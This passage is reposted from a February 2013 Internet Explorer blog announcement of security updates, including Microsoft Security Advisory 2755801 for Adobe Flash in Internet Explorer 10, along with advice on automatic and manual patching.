Explorer 8, Internet Explorer 9, and Internet Explorer 10 on all supported releases of Microsoft Windows. For more information, see the full bulletin. Microsoft Security Advisory (2755801) Microsoft is also announcing the availability of an update for the Adobe Flash Player in Internet Explorer 10 on all supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities in Adobe Flash Player by updating the affected Adobe Flash libraries contained within Internet Explorer 10. For more information please see the full advisory. Recommendation. Most customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871. For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service. — Tyson Storey, Program Manager, Internet Explorer Sursa: February 2013 Internet Explorer updates - IEBlog - Site Home - MSDN Blogs